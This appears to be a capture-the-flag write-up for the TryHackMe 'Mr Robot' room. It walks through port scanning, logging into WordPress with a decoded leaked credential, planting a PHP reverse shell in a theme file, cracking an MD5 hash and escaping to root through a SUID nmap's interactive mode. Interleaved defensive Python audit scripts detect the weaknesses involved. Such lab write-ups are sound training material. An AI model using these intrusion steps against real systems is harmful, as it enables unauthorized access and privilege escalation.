Mr Robot

Room link: https://tryhackme.com/room/mrrobot

Key 1

As always, for my first scan I used an aggressive NMAP scan.

ajread@aj-ubuntu:~/TryHackMe$ nmap -A [Remote IP]
Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-18 23:12 EST
Nmap scan report for [Remote IP]
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.77 seconds

It appears I am working with ssh and http/https on this box.

I used gobuster to enumerate port 80. It returned a LOT of hits. Just from looking at the website, there was a lot going on, so I kind of expected that.

ajread@aj-ubuntu:~/TryHackMe$ gobuster -u [Remote IP] -w /home/ajread/resources/wordlists/SecLists/Discovery/Web-Content/common.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://[Remote IP]/
[+] Threads      : 10
[+] Wordlist     : /home/ajread/resources/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/02/19 17:44:50 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/Image (Status: 301)
/admin (Status: 301)
/atom (Status: 301)
/audio (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/images (Status: 301)
/image (Status: 301)
/index.html (Status: 200)
/index.php (Status: 301)
/intro (Status: 200)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/readme (Status: 200)
/rdf (Status: 301)
/render/https://www.google.com (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss2 (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-config (Status: 200)
/wp-cron (Status: 200)
/wp-links-opml (Status: 200)
/wp-load (Status: 200)
/wp-login (Status: 200)
/wp-signup (Status: 302)
=====================================================
2022/02/19 18:02:38 Finished
=====================================================

From gobuster, there appears to be a robots.txt file. I used curl to investigate the page and found that key-1-of-3.txt is referenced there.

ajread@aj-ubuntu:~/TryHackMe$ curl http://[Remote IP]/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

I can run curl http://[Remote IP]/key-1-of-3.txt to get the first key, done!

Key 2

The output of the directory enumeration (gobuster) also pointed me to the /license directory. If I navigate to it, it appears to supply a base64-encoded string at the bottom of the page.

ajread@aj-ubuntu:~/TryHackMe$ curl http://[Remote IP]/license
...
...
...
ZWxsaW90OkVSMjgtMDY1Mgo=

The base64-encoded string decodes to elliot:ER28-0652. This looks like credentials! Also, it appears there is a login page at /wp-login. Out of curiosity, I tried the newly found credentials on the page and they worked! The site drops me into what appears to be a user blog dashboard run by WordPress version 4.3.1. I do some research and find that I can use this method: https://www.hackingarticles.in/wordpress-reverse-shell/ to upload a reverse shell. It looks like I could also go the metasploit route. But, let's be adventurous today and try the manual way. The PHP reverse shell that I use is from pentestmonkey on GitHub: https://github.com/pentestmonkey/php-reverse-shell. I made sure to change the IP and port so the shell points back to my local/attack machine.
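As an added, defender-side example (not from the original write-up): a small Python routine that scans page content for base64 tokens that decode to a user:secret pair, the kind of check a content audit or pre-deploy secret scan can run over a site's static files. The sample body is constructed here and includes the string found on /license; the token regex and the "credential shape" regex are my own assumptions about what is worth flagging.

```python
import base64
import binascii
import re

# Runs of base64 alphabet characters at least 16 long, optionally padded,
# not glued to other base64 characters on either side.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")

# Assumed "credential shape": short identifier, a colon, then a secret with no spaces.
CRED_SHAPE = re.compile(r"^[A-Za-z0-9_.@-]{1,32}:[^\s:]{4,}$")


def decode_token(token):
    """Return the decoded text if the token is valid base64 for printable ASCII,
    otherwise None (binary blobs and ordinary long words fall out here)."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    text = text.rstrip("\r\n")  # the /license string carries a trailing newline
    if not text or not text.isprintable():
        return None
    return text


def find_encoded_credentials(body):
    """Return [(token, decoded)] for every base64 token in body that decodes
    to something shaped like user:secret."""
    hits = []
    for match in B64_TOKEN.finditer(body):
        token = match.group(0)
        decoded = decode_token(token)
        if decoded is not None and CRED_SHAPE.match(decoded):
            hits.append((token, decoded))
    return hits


# Constructed page body: filler text, a binary-looking decoy, and the /license token.
SAMPLE_PAGE = """Licensed under the terms of the GNU General Public License.
Session blob: AAAAAAAAAAAAAAAAAAAAAA==
ZWxsaW90OkVSMjgtMDY1Mgo=
"""

if __name__ == "__main__":
    for token, decoded in find_encoded_credentials(SAMPLE_PAGE):
        user = decoded.split(":", 1)[0]
        print(f"{token} -> looks like credentials for user {user!r}")
```

Run against a directory of templates or a crawled copy of the site, a hit like this is a finding to fix before release; the decoy token shows why the decode-and-inspect step matters, since plenty of long alphanumeric runs are valid base64 but decode to nothing readable.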

With everything in place and following the directions from the hackingarticles site, I start a netcat listener on my local machine.

ajread@aj-ubuntu:~/TryHackMe$ nc -lnvp 9999
Listening on 0.0.0.0 9999

I run a curl command from my local machine to request the modified PHP theme file (404.php) that is, in reality, my PHP reverse shell (https://www.hackingarticles.in/wordpress-reverse-shell/).

ajread@aj-ubuntu:~$ curl http://[Remote IP]/wp-content/themes/twentyfifteen/404.php

And it drops me into a shell as daemon!

Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 23:16:15 up 38 min,  0 users,  load average: 0.00, 0.36, 1.76
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ 

I make sure to upgrade the shell with Python.

$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/$ 

If I navigate to the home folder of user robot, I find some interesting files, only one of which I have access to.

daemon@linux:/home/robot$ ls -la
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

The password.raw-md5 file appears to be an MD5 hash of user robot's credentials. I dropped the hash into crackstation (https://crackstation.net/) and found the password for user robot. With the password, I am able to authenticate as robot and read key 2!

daemon@linux:/home/robot$ su robot  
su robot 
Password: [REDACTED]

robot@linux:~$ wc -c key-2-of-3.txt
wc -c key-2-of-3.txt
33 key-2-of-3.txt
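As an added example (not part of the write-up): a Python audit that finds exactly what made key 2 reachable here, a credential-bearing file in a home directory that every local user can read. It walks one home directory, reports regular files with the other-read bit set whose name or content looks like credential material, and builds a constructed stand-in for /home/robot in a temporary directory. The filename patterns and the placeholder digest (md5 of the empty string) are my own assumptions, not the room's values.

```python
import os
import re
import shutil
import stat
import tempfile

# Assumed name patterns for files that tend to hold secrets.
SENSITIVE_NAME = re.compile(r"passw|secret|credential|token|\.raw-md5$|^id_[a-z]+$", re.I)
# A bare 32-hex-digit value: the shape of an unsalted MD5 digest.
RAW_MD5 = re.compile(r"^[0-9a-f]{32}$")


def looks_like_raw_md5(path):
    """True if the first few lines contain a bare or user:digest MD5 value."""
    try:
        with open(path, "r", errors="replace") as fh:
            head = fh.read(512)
    except OSError:
        return False
    for line in head.splitlines():
        candidate = line.rsplit(":", 1)[-1].strip()
        if RAW_MD5.match(candidate):
            return True
    return False


def audit_home(root):
    """Walk one home directory; return sorted (relative path, mode, reasons) for
    regular files readable by 'other' that look like credential material."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IROTH:
                continue  # not a regular file, or not readable by other users
            reasons = []
            if SENSITIVE_NAME.search(name):
                reasons.append("sensitive name")
            if looks_like_raw_md5(path):
                reasons.append("unsalted md5 digest")
            if reasons:
                mode = oct(stat.S_IMODE(st.st_mode))
                findings.append((os.path.relpath(path, root), mode, reasons))
    return sorted(findings)


def build_demo_home():
    """Constructed stand-in for /home/robot in a temp dir: a 0400 key file and a
    0644 hash file. Contents are placeholders, not the room's real values."""
    root = tempfile.mkdtemp(prefix="demo-home-")
    key = os.path.join(root, "key-2-of-3.txt")
    with open(key, "w") as fh:
        fh.write("0" * 32 + "\n")
    os.chmod(key, 0o400)
    hashfile = os.path.join(root, "password.raw-md5")
    with open(hashfile, "w") as fh:
        fh.write("robot:d41d8cd98f00b204e9800998ecf8427e\n")  # md5("") as a stand-in digest
    os.chmod(hashfile, 0o644)
    return root


if __name__ == "__main__":
    demo = build_demo_home()
    try:
        for rel, mode, reasons in audit_home(demo):
            print(f"{mode} {rel}: {', '.join(reasons)}")
    finally:
        shutil.rmtree(demo)
```

The 0400 key file is skipped on the permission check alone, which is the point: the listing above shows the key itself was protected, and it was the neighbouring 0644 hash file (an unsalted MD5, trivially looked up) that bridged the gap from daemon to robot.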

Key 3

Key 3 probably requires privilege escalation. I wanted to see if I could use a GTFOBins entry to execute a binary as root and inherit its privileges. I used find / -perm +6000 2>/dev/null to do so, which lists files with the SUID or SGID bit set.

robot@linux:~$ find / -perm +6000 2>/dev/null
find / -perm +6000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/declaration
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/ca-certificates
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/misc
/usr/local/share/sgml/entities
/usr/local/share/fonts
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/lib/python3.4
/usr/local/lib/python3.4/dist-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/var/local
/var/lib/libuuid
/var/mail
/sbin/unix_chkpwd
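A note on the listing above: find -perm +6000 matches any of the requested bits, so it also returns setgid directories such as /usr/local/share/xml and /var/mail (on a directory the setgid bit only makes new files inherit the group; it grants no privilege). Adding -type f narrows the search to files, and current findutils spell the any-bit form -perm /6000. As an added example, not from the write-up, here is a Python audit of such output that ignores directories, classifies each regular file as setuid or setgid, and flags anything not in an allowlist of binaries the distribution is expected to ship. The allowlist is a constructed subset, the sample entries use constructed mode bits with paths taken from the listing, and a real baseline should be generated from the package manager's file lists.

```python
import os
import stat
import sys

# Constructed allowlist: setuid/setgid binaries a stock install is expected to
# carry. A real baseline should be generated from the package manager's file
# lists and kept under version control.
EXPECTED = {
    "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/su", "/bin/umount",
    "/usr/bin/chage", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/crontab",
    "/usr/bin/expiry", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/passwd",
    "/usr/bin/ssh-agent", "/usr/bin/sudo", "/usr/bin/wall",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/pt_chown", "/sbin/unix_chkpwd",
}


def classify(mode):
    """Return 'suid', 'sgid' or 'suid+sgid' for a privileged regular file, else None.
    Directories are ignored: setgid on a directory only controls group inheritance."""
    if not stat.S_ISREG(mode):
        return None
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    if suid and sgid:
        return "suid+sgid"
    if suid:
        return "suid"
    if sgid:
        return "sgid"
    return None


def audit(entries, expected=EXPECTED):
    """entries: iterable of (path, st_mode). Returns a sorted list of (path, kind)
    for every privileged regular file that is not in the allowlist."""
    flagged = []
    for path, mode in entries:
        kind = classify(mode)
        if kind is not None and path not in expected:
            flagged.append((path, kind))
    return sorted(flagged)


def walk_modes(root="/"):
    """Yield (path, st_mode) for every entry under root, skipping pseudo filesystems.
    lstat is used so symlinks report their own mode, as find does without -L."""
    skip = {"/proc", "/sys", "/dev", "/run"}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue


# Constructed sample mirroring the find output above (mode bits are assumed).
SAMPLE = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755),       # expected setuid binary
    ("/usr/local/bin/nmap", stat.S_IFREG | 0o4755),   # setuid copy outside the package manager
    ("/usr/bin/screen", stat.S_IFREG | 0o2755),       # setgid, not in this allowlist
    ("/usr/local/share/xml", stat.S_IFDIR | 0o2775),  # setgid directory: listed by find, no privilege
    ("/var/mail", stat.S_IFDIR | 0o2775),
    ("/bin/ls", stat.S_IFREG | 0o755),                # ordinary binary
]

if __name__ == "__main__":
    entries = walk_modes(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for path, kind in audit(entries):
        print(f"{kind:9} {path}")
```

Run with a root path as its argument it audits a live filesystem; without one it audits the constructed sample, where the setuid nmap under /usr/local/bin is exactly the entry a baseline comparison surfaces, and the setgid directories drop out before anyone has to eyeball them.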

Looking through the output of the command, it looks like I can escalate privileges using nmap (/usr/local/bin/nmap) in interactive mode (https://vk9-sec.com/nmap-privilege-escalation/).

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help

Nmap has some cool commands in interactive mode that I didn't know about.

nmap> h
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish.  Results are printed to the
screen (of course you can still use file output commands).
! <command>   -- runs shell command given in the foreground
x             -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen).  You should generally specify a
file for results (with -oX, -oG, or -oN).  If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings.  If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h          -- Obtain help with Nmap syntax
h             -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24

Prefixing a line with ! runs it as a shell command. And just like that, I can read the last key!

nmap> !wc -c /root/key-3-of-3.txt
!wc -c /root/key-3-of-3.txt
33 /root/key-3-of-3.txt
waiting to reap child : No child processes
